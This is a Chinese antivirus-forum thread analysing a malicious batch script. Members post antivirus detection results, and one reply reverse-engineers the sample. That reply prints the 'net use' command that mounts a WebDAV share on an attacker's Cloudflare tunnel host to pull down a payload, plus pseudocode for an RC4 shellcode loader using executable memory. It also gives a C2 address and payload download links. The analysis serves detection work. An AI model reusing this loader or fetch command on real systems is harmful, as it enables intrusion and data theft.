查看: 735|回复: 13
收起左侧

[病毒样本] 恶意bat脚本

[复制链接]
御坂14857号
发表于 前天 22:30 | 显示全部楼层 |阅读模式
本帖最后由 御坂14857号 于 2025-5-17 00:37 编辑

https://wwqr.lanzouy.com/ipqhQ2weybkj
https://wormhole.app/z9eaO6#kO5urAEtIwgBAT0Bb1SynQ

关联服务器:hxxps://digital-childrens-junior-cure.trycloudflare.com/

vt首次上传,检出2x(Avast/AVG):
https://www.virustotal.com/gui/f ... 7320ef7c2?nocache=1
微步判定安全:
https://s.threatbook.com/report/ ... 7e1df204ed7320ef7c2


GDHJDSYDH
发表于 前天 22:45 | 显示全部楼层
本帖最后由 GDHJDSYDH 于 2025-5-16 22:54 编辑

EIS扫描miss,沙盒内运行后冰盾拦截数次,多沙箱平台检测出威胁

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ft-cai
发表于 前天 22:46 | 显示全部楼层
any.run
要python才能运行?
御坂14857号
 楼主| 发表于 前天 23:11 | 显示全部楼层
ft-cai 发表于 2025-5-16 22:46
any.run
要python才能运行?

这个bat下了一个压缩包(jaka.zip),里面有python环境的,用来运行了一个叫yea.py的文件:
https://wormhole.app/bLQDxP#2YDzuDVtUtEJWbB5Wc2UWg

这个py文件在vt上有6个检出:
https://www.virustotal.com/gui/f ... ac835693b47a7bacfad

评分

参与人数 1人气 +1 收起 理由
ft-cai + 1 qwq我这电脑没看到

查看全部评分

Rukia
发表于 前天 23:20 | 显示全部楼层
卡巴
cl.bat-UDS:Trojan.BAT.Alien.gen
lsop1349987
发表于 前天 23:21 | 显示全部楼层
emsisoft拦截网址

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
吃瓜群众第123位
发表于 前天 23:24 | 显示全部楼层
Avast kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Fadouse
发表于 前天 23:49 | 显示全部楼层
本帖最后由 Fadouse 于 2025-5-17 01:18 编辑

BDGZ Kill


简易逆向

双击后调用net组件加载远程共享磁盘
  1. net  use Z: "\\digital-childrens-junior-cure.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
复制代码
并下载python环境和恶意载荷 释放至 用户文件夹下的联系人目录中

下载后删除
  1. net  use Z: /delete /yes
复制代码
恶意载荷为python编写,为jaka.zip中 yea.py 文件
改文件被混淆


对py文件进行分析发现,这是一段 rc4加密的shellcodeloader
伪代码如下
  1. import ctypes, base64

  2. def rc4_decrypt(key: bytes, data: bytes) -> bytes:
  3.     # Key-Scheduling Algorithm (KSA)
  4.     S = list(range(256))
  5.     j = 0
  6.     for i in range(256):
  7.         j = (j + S[i] + key[i % len(key)]) % 256
  8.         S[i], S[j] = S[j], S[i]
  9.     # Pseudo-Random Generation Algorithm (PRGA)
  10.     i = j = 0
  11.     out = bytearray()
  12.     for byte in data:
  13.         i = (i + 1) % 256
  14.         j = (j + S[i]) % 256
  15.         S[i], S[j] = S[j], S[i]
  16.         K = S[(S[i] + S[j]) % 256]
  17.         out.append(byte ^ K)
  18.     return bytes(out)

  19. def load_and_execute():
  20.     encrypted = base64.b64decode('encoded shellcode') {index=11}
  21.     key       = b"xWp0LaAO"
  22.     shellcode = rc4_decrypt(key, encrypted)

  23.     # Allocate and make memory executable
  24.     buf = ctypes.create_string_buffer(shellcode)
  25.     ctypes.windll.kernel32.VirtualProtect(
  26.         ctypes.byref(buf),
  27.         ctypes.sizeof(buf),
  28.         0x40,                # PAGE_EXECUTE_READWRITE
  29.         ctypes.byref(ctypes.c_ulong())
  30.     )

  31.     # Cast to function pointer and call
  32.     fn = ctypes.cast(buf, ctypes.CFUNCTYPE(ctypes.c_void_p))
  33.     fn()

  34. if __name__ == "__main__":
  35.     load_and_execute()
复制代码
提取shellcode后上传vt进行初步分析,发现shellcode是由donut工具将dll/exe文件转换的shellcode
VirusTotal - File - 7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573


使用github 工具解密shellcode得到原始shellcode
并提交vt分析,发现家族有可能是lazy 泄密木马

动态分析

样本会创建一个父进程欺骗的notepad.exe,分配内存后执行apc注入
C2 ip: 95.217.129.88:5921



核心载荷下载 https://www.123912.com/s/HmItjv-Tm22?提取码:VeTM
Shellcode二进制文件下载 https://www.123912.com/s/HmItjv-vm22?提取码:dYAH





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2人气 +5 收起 理由
wwwab + 3 这样本有点意思
御坂14857号 + 2 感谢提供分享

查看全部评分

心醉咖啡
发表于 前天 23:55 | 显示全部楼层
火绒扫描miss
biue
发表于 昨天 00:13 | 显示全部楼层
腾讯电脑管家 不报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-18 15:40 , Processed in 0.117794 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表